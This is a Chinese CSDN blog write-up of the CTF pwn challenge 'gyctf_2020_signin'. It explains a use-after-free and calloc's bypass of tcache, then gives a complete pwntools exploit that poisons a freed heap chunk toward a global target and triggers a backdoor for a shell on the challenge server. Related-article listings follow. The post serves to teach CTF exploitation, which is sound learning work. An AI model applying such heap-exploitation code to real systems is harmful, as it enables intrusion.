gyctf_2020_signin

最新推荐文章于 2024-06-14 09:32:35 发布
最新推荐文章于 2024-06-14 09:32:35 发布
阅读量380 收藏
点赞数
分类专栏: PWN 文章标签: 安全 unix 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_57754423/article/details/124051300
版权

漏洞:uaf

新知识:

calloc函数会直接绕过tcache从fastbin中取,后门函数中又backdoor并且向其中写入数据1,所以我们只需有吧target的地址链入fastbin即可getshell

exp:

from pwn import *
from LibcSearcher import * 

local_file  = './signin'
local_libc  = './libc-2.27.so'
# remote_libc = './libc-2.23.so'

context.terminal = ['tmux', 'splitw', '-h']
context.log_level = 'debug'
e = ELF(local_file)
context.arch = e.arch

select = 1
if select == 0:
    r = process(local_file)
    libc = ELF(local_libc)
else:
    r = remote('node4.buuoj.cn', 28883)
    libc = ELF(local_libc)

se      = lambda data               :r.send(data) 
sa      = lambda delim,data         :r.sendafter(delim, data)
sl      = lambda data               :r.sendline(data)
sla     = lambda delim,data         :r.slafter(delim, data)
sea     = lambda delim,data         :r.sendafter(delim, data)
rc      = lambda numb=4096          :r.recv(numb)
rl      = lambda                    :r.recvline()
ru      = lambda delims			    :r.recvuntil(delims)
uu32    = lambda data               :u32(ru(data)[-4:].ljust(4, b'\0'))
uu64    = lambda data               :u64(ru(data)[-6:].ljust(8, b'\0'))
info_addr = lambda tag, addr        :r.info(tag + ': {:#x}'.format(addr))


def dbg():
	gdb.attach(r)
	pause()

menu = 'your choice?'

def add(index):
    sa(menu, '1')
    sa('idx?', str(index))

def edit(index, content):
    sa(menu, '2')
    sa('idx?', str(index))
    sl(content)

def delete(index):
    sa(menu, '3')
    sa('idx?', str(index))

chunk_ptr = 0x4040E0
target = 0x4040C0
flag = 0x404160
edit_cnt = 0x4040BC
add_cnt = 0x404088

for i in range(8):
	add(i)
for i in range(8):
	delete(i)
add(8)
edit(7,p64(target-0x10))

sa(menu, '6')




r.interactive()

cut_maize
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【pwn】 gyctf_2020_borrowstack
Nothing
03-02 1613
例行检查 程序逻辑 看到buf缓冲区有0x10大小溢出,且可以控制bss段上的bank,可以用栈迁移做,这题的bss段离got表较近,在迁移时尽量往高地址迁移,防止在rop时破坏got表上数据。 from pwn import * io=remote('node3.buuoj.cn','29302') bank=0x0601080 leave=0x400699 puts_plt=0x0400...
BUUCTF-PWN刷题记录-7
weixin_44145820的博客
04-15 877
目录roarctf_2019_realloc_magic roarctf_2019_realloc_magic
gyctf_2020_signin(calloc特性,uaf,tcache特性)
m0_51251108的博客
11-04 466
gyctf_2020_signin: 参考师傅:yongbaoii 逆向分析: 主界面: 三个功能,add,edit,free,还有个backdoor add函数: edit函数: free函数: 有个标记检查,doublefree不能用了 backdoor: 还有个calloc函数 这里分配一个0x70大小的chunk calloc 有以下特性 不会分配 tcache chunk 中的 chunk 。 tcache 有以下特性 在分配 fastbin 中的 chunk 时若还有其他相同大
BUUCTF:[GYCTF2020]EasyThinking
末初的CSDN博客
03-28 3446
参考:https://www.cnblogs.com/yesec/p/12571861.html 目录扫描,存在源码泄露www.zip ThinkPHP框架 ThinPHPV6.0.0 漏洞成因:ThinkPHP6任意文件操作漏洞分析 session可控,修改session,长度为32位,session后缀改为.php(加上.php后为32位) 然后再search搜索的内容会直接保存在/ru...
gyctf_2020_signin【write up】
m0_73756460的博客
04-14 90
buu刷题 gyctf_2020_signin【write up】
calloc with tcache&&gyctf_2020_signin
azraelxuemo的博客
03-25 965
文章目录gyctf_2020_signin分析add函数deleteeditbackdoor思路__libc_callo_int_malloc回到题目 今天做了一道题目,利用了glibc-2.27里面的一个新机制,感觉自己对于glibc-2.23和glibc-2.27的区别还不是很明确,那么我们来比对一下这两个版本的一些函数 一直有这样的一种思维嘛,对于glibc2.27来说,释放的内存会先进入tcache,如果大小合适会从tcache里面优先分配,我们来看看原因 上图是__libc_malloc里面的执
PhoneX_NO_CHECK_v2.2.7_release_2020-10-12_227_jiagu_sign.apk.1.apk
09-18
PhoneX_NO_CHECK_v2.2.7_release_2020-10-12_227_jiagu_sign.apk.1.apk
sign_javascript_开源_SiGN标记_消息机制_2020_
10-03
Sign 标记事件管理器## 版本 * v1.0 2020/5/22
SSO.rar_The Sign
09-19
Java Based IEEE Project Single Sign on Mechnanism. as per the paper we use RSA Algorithm. Zebros Successfully implement this task.
MATLAB.rar_sign language
09-22
比较全的MATLAB常用指令表与MATLAB软件符号语言工具箱,方便大家使用。
sq.rar_sign function
09-20
舌签功能 舌签功能 舌签功能 舌签功能
数字时代网络安全即服务的兴起
网络研究观
06-11 570
网络安全即服务是一种通过基于云的服务来管理安全需求的综合方法。
等保测评和安全运维
weixin_64392888的博客
06-11 606
通过将等保测评的标准和流程融入日常的安全运维工作中,企业可以更有效地识别和应对网络安全威胁,构建起一个全面、动态的网络安全防护体系。为了应对这些挑战,企业不仅要实施有效的安全运维措施,还需要通过等保测评确保其信息系统符合国家的安全标准。等保测评提供了一套标准化的安全要求,安全运维团队可以根据这些要求,实施相应的安全措施,如加强访问控制、数据加密、网络安全防护等。通过等保测评,企业可以识别信息系统的安全风险,并根据测评结果制定或调整安全策略,确保安全措施与企业的实际需求相匹配。
《软件定义安全》之六:SDN和NFV安全实践
大龄IT民工
06-11 1271
DDoS检测清洗应用ADS APP的设计思路:借助安全控制平台中流相关的组件,从SDN控制器中获得相应的流量,并根据抗DDoS应用订阅的恶意流特征进行检测,发现恶意流量后,应用可根据细粒度的检测判断是否出现恶意攻击。如是,则下发实时清洗的流指令,即可将恶意流量牵引到清洗设备ADS上。过程如下:➊注册。启动阶段,ADS设备和ADS APP均向安全控制平台注册,提供自己的基本信息,如类型、位置和能力等。➋订阅。为获取并检查可疑流,ADS APP向安全控制器发送订阅。➌流统计获取和检查。
如何确保数据跨域交换安全、合规、可追溯性?
最新发布
文件数据安全交换
06-14 211
飞驰云联是中国领先的数据安全传输解决方案提供商,长期专注于安全可控、性能卓越的数据传输技术和解决方案,公司产品和方案覆盖了跨网跨区域的数据安全交换、供应链数据安全传输、数据传输过程的防泄漏、FTP的增强和国产化替代、文件传输自动化和传输集成等各种数据传输场景。针对上述问题,推荐采用统一的数据跨域交换管控平台,如飞驰云联《Ftrans MDE多区域文件交换系统》,帮助企业构建统一、安全、高效的数据跨域交换通道,确保数据在多地理区域、多网络区域、多分支机构间准确、高效地传输。问题:明文传输,容易被截获和窃取;
展会邀请 | 龙智即将亮相2024上海国际嵌入式展,带来安全合规、单一可信数据源、可追溯、高效协同的嵌入式开发解决方案
weixin_49715102的博客
06-09 942
凭借在DevSecOps领域的深厚积累,龙智在全球范围内遴选优秀的专业工具,为嵌入式开发行业打造了专属的嵌入式开发解决方案,并提供专业咨询、方案定制、实施部署、专业培训、定制开发等一站式服务支持。等全球专业工具,覆盖嵌入式软件单元测试、静态代码分析、需求管理、版本控制、生命周期管理及项目管理、知识库管理等领域,助力企业实现安全合规、可追溯、单一可信数据源、高效协同的嵌入式开发。并且嵌入式系统往往非常复杂,需要全面的测试覆盖、高效的测试执行,才能确保系统的可靠性和正确性,以及产品的及时交付。
安全漏洞扫描工具
weixin_45639224的博客
06-05 662
安全漏洞扫描工具
蓝牙安全入门——两道CTF题目复现
weixin_66578482的博客
06-10 870
🚀🚀蓝牙中的安全管理协议(Security Manager Protocol,SMP)是负责蓝牙设备间的配对和加密的协议。🚀🚀SMP广泛应用于需要安全数据传输的蓝牙设备,如智能手表、健身追踪器、无线耳机和医疗设备。🚀🚀SMP的主要功能之一是处理设备间的配对过程。🚀🚀最近一直对车联网比较感兴趣,但是面试官说我有些技术栈缺失,所以还得狠狠补,先从蓝牙开始吧,因为刚好有道CTF的题目可以复现一下。🚀🚀虽然SMP提供了题目 蓝牙钥匙的春天 题目 low_energy_crypto
GoogleSignInOptions.DEFAULT_SIGN_IN
06-07
`GoogleSignInOptions.DEFAULT_SIGN_IN` 是一个 `GoogleSignInOptions` 对象的常量,默认情况下,它包含请求用户的基本资料信息和 ID Token,以进行 Google 登录。这个常量是使用 `GoogleSignInOptions.Builder` ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值